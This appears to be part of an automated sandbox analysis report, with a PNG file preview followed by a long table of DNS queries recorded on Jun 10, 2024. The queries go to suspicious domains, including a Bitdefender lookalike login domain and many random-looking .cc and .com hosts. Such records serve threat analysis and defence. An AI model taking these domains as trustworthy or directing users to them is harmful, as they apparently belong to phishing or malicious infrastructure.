                                                                                                                                                          Preview:.PNG........IHDR...%...%...... .....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.6 (Macintosh)" xmpMM:InstanceID="xmp.iid:C527148F1EC611EE8653DFFA3047B159" xmpMM:DocumentID="xmp.did:C52714901EC611EE8653DFFA3047B159"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DB807D401E3C11EE8653DFFA3047B159" stRef:documentID="xmp.did:C527148E1EC611EE8653DFFA3047B159"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>6%^[....IDATx..{l.E..o.r.E.%..B.......Dz...#..Cc.../....J..<.@4..............!.4.Q1..jS.........w..w.w..&.....
                                                                                                                                                          No static file info
                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                          Jun 10, 2024 00:40:23.080575943 CEST192.168.2.51.1.1.10xd84eStandard query (0)www.bitdefenderlogin.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:23.080713034 CEST192.168.2.51.1.1.10x6477Standard query (0)www.bitdefenderlogin.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:23.767184973 CEST192.168.2.51.1.1.10xae5aStandard query (0)www.bitdefenderlogin.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:25.899472952 CEST192.168.2.51.1.1.10x28c3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:25.899622917 CEST192.168.2.51.1.1.10x7940Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:25.925757885 CEST192.168.2.51.1.1.10x5a96Standard query (0)www.698jbwad.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:25.925914049 CEST192.168.2.51.1.1.10x3a40Standard query (0)www.698jbwad.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:26.594676971 CEST192.168.2.51.1.1.10xbd36Standard query (0)www.698jbwad.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:27.442961931 CEST192.168.2.51.1.1.10x7ed2Standard query (0)www.bitdefenderlogin.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:27.443231106 CEST192.168.2.51.1.1.10xb79fStandard query (0)www.bitdefenderlogin.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:27.797620058 CEST192.168.2.51.1.1.10x58bStandard query (0)www.bitdefenderlogin.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.856146097 CEST192.168.2.51.1.1.10x3811Standard query (0)www.image110.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.856333017 CEST192.168.2.51.1.1.10xd7ffStandard query (0)www.image110.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.905829906 CEST192.168.2.51.1.1.10xfeeStandard query (0)js.users.51.laA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.906317949 CEST192.168.2.51.1.1.10xdd88Standard query (0)js.users.51.la65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.914175987 CEST192.168.2.51.1.1.10x8166Standard query (0)www.698jbwad.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.914484978 CEST192.168.2.51.1.1.10xdcd1Standard query (0)www.698jbwad.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:29.301585913 CEST192.168.2.51.1.1.10x8926Standard query (0)www.698jbwad.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:29.502408028 CEST192.168.2.51.1.1.10x7f95Standard query (0)www.image110.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:31.013407946 CEST192.168.2.51.1.1.10x703bStandard query (0)f21714.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:31.013606071 CEST192.168.2.51.1.1.10x3cf1Standard query (0)f21714.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:31.372446060 CEST192.168.2.51.1.1.10xe219Standard query (0)www.image110.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:31.372706890 CEST192.168.2.51.1.1.10x4f4aStandard query (0)www.image110.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:36.293380976 CEST192.168.2.51.1.1.10x80d1Standard query (0)x551005.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:36.293440104 CEST192.168.2.51.1.1.10x60f5Standard query (0)x551005.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:39.588396072 CEST192.168.2.51.1.1.10xb028Standard query (0)x551005.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:39.588606119 CEST192.168.2.51.1.1.10x3f12Standard query (0)x551005.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:40.268462896 CEST192.168.2.51.1.1.10x2a0fStandard query (0)hg679.ccA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:40.268687010 CEST192.168.2.51.1.1.10x6e91Standard query (0)hg679.cc65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.311399937 CEST192.168.2.51.1.1.10xc8f0Standard query (0)wssa-371.laorrey.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.311635017 CEST192.168.2.51.1.1.10x2318Standard query (0)_1886._https.wssa-371.laorrey.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.312788010 CEST192.168.2.51.1.1.10xc55aStandard query (0)wssa-301.shiwanxin.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.313137054 CEST192.168.2.51.1.1.10xbb8bStandard query (0)_1186._https.wssa-301.shiwanxin.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.313412905 CEST192.168.2.51.1.1.10x8403Standard query (0)ocsapi1961.hydqef.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.313632011 CEST192.168.2.51.1.1.10xea2fStandard query (0)ocsapi1961.hydqef.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.356760025 CEST192.168.2.51.1.1.10xf58eStandard query (0)wssa-371.laorrey.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.393604040 CEST192.168.2.51.1.1.10xde71Standard query (0)api.tongjiniao.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.393938065 CEST192.168.2.51.1.1.10x153cStandard query (0)api.tongjiniao.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.395169973 CEST192.168.2.51.1.1.10x2f70Standard query (0)ia.51.laA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.398017883 CEST192.168.2.51.1.1.10x44b6Standard query (0)ia.51.la65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:43.009427071 CEST192.168.2.51.1.1.10xf92fStandard query (0)hg679.ccA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:43.009769917 CEST192.168.2.51.1.1.10x35dcStandard query (0)hg679.cc65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:43.367468119 CEST192.168.2.51.1.1.10xa256Standard query (0)api.tongjiniao.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:43.367615938 CEST192.168.2.51.1.1.10x9159Standard query (0)api.tongjiniao.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:43.971199989 CEST192.168.2.51.1.1.10xa17aStandard query (0)wssa-301.shiwanxin.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:43.971337080 CEST192.168.2.51.1.1.10x5847Standard query (0)_1186._https.wssa-301.shiwanxin.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.003245115 CEST192.168.2.51.1.1.10x3615Standard query (0)e933002.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.003451109 CEST192.168.2.51.1.1.10xcbcfStandard query (0)e933002.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.306864977 CEST192.168.2.51.1.1.10xd7dStandard query (0)brhrjf.yuhu06.xyzA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.307281971 CEST192.168.2.51.1.1.10x1bd6Standard query (0)brhrjf.yuhu06.xyz65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.446501970 CEST192.168.2.51.1.1.10x9dddStandard query (0)ocsapi1961.wwwbyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.446646929 CEST192.168.2.51.1.1.10x2c5eStandard query (0)ocsapi1961.wwwbyfen.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.447693110 CEST192.168.2.51.1.1.10x5193Standard query (0)ocsapi-aws.bakeddove.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.447865963 CEST192.168.2.51.1.1.10x189eStandard query (0)ocsapi-aws.bakeddove.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.448349953 CEST192.168.2.51.1.1.10x2057Standard query (0)ocsapi-aka.blackkhaki918.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.448596954 CEST192.168.2.51.1.1.10xf7deStandard query (0)ocsapi-aka.blackkhaki918.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.540869951 CEST192.168.2.51.1.1.10x1db7Standard query (0)ia.51.laA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.541019917 CEST192.168.2.51.1.1.10x52f0Standard query (0)ia.51.la65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.572983027 CEST192.168.2.51.1.1.10xb295Standard query (0)ocsapi1961.hydqef.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.573129892 CEST192.168.2.51.1.1.10xd87Standard query (0)ocsapi1961.hydqef.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.321088076 CEST192.168.2.51.1.1.10x6949Standard query (0)brhrjf.yuhu06.xyzA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.321836948 CEST192.168.2.51.1.1.10x5b30Standard query (0)brhrjf.yuhu06.xyz65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.863209009 CEST192.168.2.51.1.1.10x86aaStandard query (0)ocsapi-aka.blackkhaki918.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.863359928 CEST192.168.2.51.1.1.10xcc31Standard query (0)ocsapi-aka.blackkhaki918.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.309906006 CEST192.168.2.51.1.1.10x6513Standard query (0)ocsapi-aws.bakeddove.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.310097933 CEST192.168.2.51.1.1.10x80c1Standard query (0)ocsapi-aws.bakeddove.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.796448946 CEST192.168.2.51.1.1.10x6fa0Standard query (0)e933002.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.797097921 CEST192.168.2.51.1.1.10xbb00Standard query (0)e933002.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:48.264870882 CEST192.168.2.51.1.1.10x8edbStandard query (0)xpj723.ccA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:48.265181065 CEST192.168.2.51.1.1.10xa78fStandard query (0)xpj723.cc65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:48.990287066 CEST192.168.2.51.1.1.10xc511Standard query (0)wssa-371.laorrey.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:48.990500927 CEST192.168.2.51.1.1.10x70e8Standard query (0)_1886._https.wssa-371.laorrey.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:49.321290970 CEST192.168.2.51.1.1.10x46d5Standard query (0)wssa-371.laorrey.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:49.626560926 CEST192.168.2.51.1.1.10x13c7Standard query (0)zb-qq.gzjqwlkj.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:49.627075911 CEST192.168.2.51.1.1.10x9831Standard query (0)zb-qq.gzjqwlkj.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:49.627511024 CEST192.168.2.51.1.1.10x10e9Standard query (0)zb1-hw.qectyoua.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:49.628046036 CEST192.168.2.51.1.1.10x4f2dStandard query (0)zb1-hw.qectyoua.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:49.628443003 CEST192.168.2.51.1.1.10xad6cStandard query (0)zb-hw.czwygs.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:49.629008055 CEST192.168.2.51.1.1.10x2463Standard query (0)zb-hw.czwygs.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.220828056 CEST192.168.2.51.1.1.10x4233Standard query (0)wssa-371.laorrey.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.221380949 CEST192.168.2.51.1.1.10x730aStandard query (0)_1886._https.wssa-371.laorrey.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.223350048 CEST192.168.2.51.1.1.10x7a77Standard query (0)wssa-301.shiwanxin.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.228521109 CEST192.168.2.51.1.1.10x4a42Standard query (0)_1186._https.wssa-301.shiwanxin.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.229159117 CEST192.168.2.51.1.1.10xe311Standard query (0)ocsapi1961.hydqef.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.229434967 CEST192.168.2.51.1.1.10xc0e3Standard query (0)ocsapi1961.hydqef.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.605381012 CEST192.168.2.51.1.1.10xae40Standard query (0)ocsapi-lc.tingmeikj.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.606179953 CEST192.168.2.51.1.1.10x98a5Standard query (0)ocsapi-lc.tingmeikj.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.616070032 CEST192.168.2.51.1.1.10xf536Standard query (0)ahd-ocssn.qqxgo.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.616070032 CEST192.168.2.51.1.1.10xe126Standard query (0)ahd-ocssn.qqxgo.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.619414091 CEST192.168.2.51.1.1.10xa361Standard query (0)wssa-341.dalianjrkj.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.619810104 CEST192.168.2.51.1.1.10x78afStandard query (0)_1586._https.wssa-341.dalianjrkj.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.628982067 CEST192.168.2.51.1.1.10x2166Standard query (0)xpj723.ccA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.629674911 CEST192.168.2.51.1.1.10x3dedStandard query (0)xpj723.cc65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:51.887526989 CEST192.168.2.51.1.1.10xfd6Standard query (0)8vpfnx.eveday.meA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:51.887833118 CEST192.168.2.51.1.1.10x80ecStandard query (0)8vpfnx.eveday.me65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.004080057 CEST192.168.2.51.1.1.10x3766Standard query (0)wns732.ccA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.004822016 CEST192.168.2.51.1.1.10xfdd4Standard query (0)wns732.cc65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.040271044 CEST192.168.2.51.1.1.10x601eStandard query (0)zb-hw.czwygs.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.057845116 CEST192.168.2.51.1.1.10x2e73Standard query (0)zb-hw.czwygs.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.683967113 CEST192.168.2.51.1.1.10xa02aStandard query (0)wssa-341.dalianjrkj.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.684364080 CEST192.168.2.51.1.1.10xeff9Standard query (0)_1586._https.wssa-341.dalianjrkj.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.685512066 CEST192.168.2.51.1.1.10x33a0Standard query (0)zb-qq.gzjqwlkj.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.685645103 CEST192.168.2.51.1.1.10x1a33Standard query (0)zb-qq.gzjqwlkj.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.687758923 CEST192.168.2.51.1.1.10x80f5Standard query (0)zb1-hw.qectyoua.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.688102007 CEST192.168.2.51.1.1.10x4b2eStandard query (0)zb1-hw.qectyoua.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.927634001 CEST192.168.2.51.1.1.10xf291Standard query (0)8vpfnx.eveday.meA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.048619986 CEST192.168.2.51.1.1.10xceffStandard query (0)ahd-ocssn.qqxgo.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.048800945 CEST192.168.2.51.1.1.10x15f7Standard query (0)ahd-ocssn.qqxgo.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.065443039 CEST192.168.2.51.1.1.10x25eStandard query (0)ocsapi-lc.tingmeikj.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.065716028 CEST192.168.2.51.1.1.10xe39Standard query (0)ocsapi-lc.tingmeikj.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.689663887 CEST192.168.2.51.1.1.10x3418Standard query (0)wssa-371.laorrey.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.689937115 CEST192.168.2.51.1.1.10xdcebStandard query (0)_1886._https.wssa-371.laorrey.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.690853119 CEST192.168.2.51.1.1.10x4384Standard query (0)wssa-301.shiwanxin.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.691056013 CEST192.168.2.51.1.1.10x2be1Standard query (0)_1186._https.wssa-301.shiwanxin.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.691718102 CEST192.168.2.51.1.1.10xce94Standard query (0)ocsapi1961.hydqef.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.691884041 CEST192.168.2.51.1.1.10x235bStandard query (0)ocsapi1961.hydqef.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.093246937 CEST192.168.2.51.1.1.10x1a8bStandard query (0)ocsapi-lc.tingmeikj.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.118024111 CEST192.168.2.51.1.1.10x53bcStandard query (0)wns732.ccA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.118171930 CEST192.168.2.51.1.1.10xe497Standard query (0)wns732.cc65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.802246094 CEST192.168.2.51.1.1.10x8d07Standard query (0)wssa-371.laorrey.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.802836895 CEST192.168.2.51.1.1.10x309dStandard query (0)_1886._https.wssa-371.laorrey.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:54.814555883 CEST192.168.2.51.1.1.10x355eStandard query (0)wssa-371.laorrey.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.258147001 CEST192.168.2.51.1.1.10xa762Standard query (0)zb-qq.gzjqwlkj.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.258305073 CEST192.168.2.51.1.1.10x86eStandard query (0)zb-qq.gzjqwlkj.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.262068987 CEST192.168.2.51.1.1.10x4b81Standard query (0)zb1-hw.qectyoua.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.262536049 CEST192.168.2.51.1.1.10x2362Standard query (0)zb1-hw.qectyoua.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.263273954 CEST192.168.2.51.1.1.10x9782Standard query (0)zb-hw.czwygs.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:55.263669014 CEST192.168.2.51.1.1.10xd875Standard query (0)zb-hw.czwygs.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:56.009322882 CEST192.168.2.51.1.1.10xd602Standard query (0)js326.ccA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:56.009573936 CEST192.168.2.51.1.1.10x44fStandard query (0)js326.cc65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.331952095 CEST192.168.2.51.1.1.10x7912Standard query (0)wssa-371.laorrey.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.332642078 CEST192.168.2.51.1.1.10xcfc3Standard query (0)_1886._https.wssa-371.laorrey.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.774806023 CEST192.168.2.51.1.1.10x8dcbStandard query (0)wssa-371.laorrey.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.775239944 CEST192.168.2.51.1.1.10x6531Standard query (0)_1886._https.wssa-371.laorrey.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.776403904 CEST192.168.2.51.1.1.10xe404Standard query (0)wssa-301.shiwanxin.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.776635885 CEST192.168.2.51.1.1.10x6749Standard query (0)_1186._https.wssa-301.shiwanxin.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.777290106 CEST192.168.2.51.1.1.10x8366Standard query (0)ocsapi1961.hydqef.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.777759075 CEST192.168.2.51.1.1.10xc32bStandard query (0)ocsapi1961.hydqef.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.806813002 CEST192.168.2.51.1.1.10x6f20Standard query (0)zb-qq.gzjqwlkj.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.807081938 CEST192.168.2.51.1.1.10x7ed5Standard query (0)zb-qq.gzjqwlkj.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.811474085 CEST192.168.2.51.1.1.10xb2f5Standard query (0)zb1-hw.qectyoua.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.811886072 CEST192.168.2.51.1.1.10x8ad2Standard query (0)zb1-hw.qectyoua.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.812607050 CEST192.168.2.51.1.1.10xe715Standard query (0)zb-hw.czwygs.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:57.813180923 CEST192.168.2.51.1.1.10xda9dStandard query (0)zb-hw.czwygs.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.418982029 CEST192.168.2.51.1.1.10xb510Standard query (0)ocsapi-lc.tingmeikj.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.419117928 CEST192.168.2.51.1.1.10x681Standard query (0)ocsapi-lc.tingmeikj.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.419567108 CEST192.168.2.51.1.1.10x2dbaStandard query (0)ahd-ocssn.qqxgo.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.419805050 CEST192.168.2.51.1.1.10xaaa1Standard query (0)ahd-ocssn.qqxgo.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.420371056 CEST192.168.2.51.1.1.10x4dccStandard query (0)wssa-341.dalianjrkj.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:58.420584917 CEST192.168.2.51.1.1.10x89cdStandard query (0)_1586._https.wssa-341.dalianjrkj.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:59.531490088 CEST192.168.2.51.1.1.10xa8abStandard query (0)js326.ccA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:59.531936884 CEST192.168.2.51.1.1.10x174bStandard query (0)js326.cc65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:59.969990015 CEST192.168.2.51.1.1.10x57ddStandard query (0)ocsapi1961.wwwbyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:59.970681906 CEST192.168.2.51.1.1.10x6969Standard query (0)ocsapi1961.wwwbyfen.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:59.973709106 CEST192.168.2.51.1.1.10x22cbStandard query (0)ocsapi-aws.bakeddove.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:59.974324942 CEST192.168.2.51.1.1.10x1138Standard query (0)ocsapi-aws.bakeddove.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:59.975809097 CEST192.168.2.51.1.1.10xc2b3Standard query (0)ocsapi-aka.blackkhaki918.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:59.977106094 CEST192.168.2.51.1.1.10xe0aStandard query (0)ocsapi-aka.blackkhaki918.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:00.419872046 CEST192.168.2.51.1.1.10x866cStandard query (0)stt-wasm.ai4funs.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:00.420221090 CEST192.168.2.51.1.1.10x5ca3Standard query (0)stt-wasm.ai4funs.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:00.476738930 CEST192.168.2.51.1.1.10x3f2Standard query (0)ocsapi-aws.huayidm.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:00.477292061 CEST192.168.2.51.1.1.10x222bStandard query (0)ocsapi-aws.huayidm.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:00.500829935 CEST192.168.2.51.1.1.10x6588Standard query (0)appiso-ty.souzhanzx.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:00.501090050 CEST192.168.2.51.1.1.10xddbcStandard query (0)_1066._https.appiso-ty.souzhanzx.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:00.501677036 CEST192.168.2.51.1.1.10x14cfStandard query (0)appiso-ty.zvbzjsb.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:00.502044916 CEST192.168.2.51.1.1.10x2731Standard query (0)_8066._https.appiso-ty.zvbzjsb.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:00.615147114 CEST192.168.2.51.1.1.10xdee1Standard query (0)yh8613.ccA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:00.615645885 CEST192.168.2.51.1.1.10x59a9Standard query (0)yh8613.cc65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:01.515439034 CEST192.168.2.51.1.1.10x72afStandard query (0)appiso-ty.souzhanzx.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:02.657324076 CEST192.168.2.51.1.1.10xc6f2Standard query (0)wssa-371.laorrey.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:02.659288883 CEST192.168.2.51.1.1.10x2017Standard query (0)_1886._https.wssa-371.laorrey.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:02.663043976 CEST192.168.2.51.1.1.10xeb49Standard query (0)wssa-301.shiwanxin.comA (IP address)IN (0x0001)false
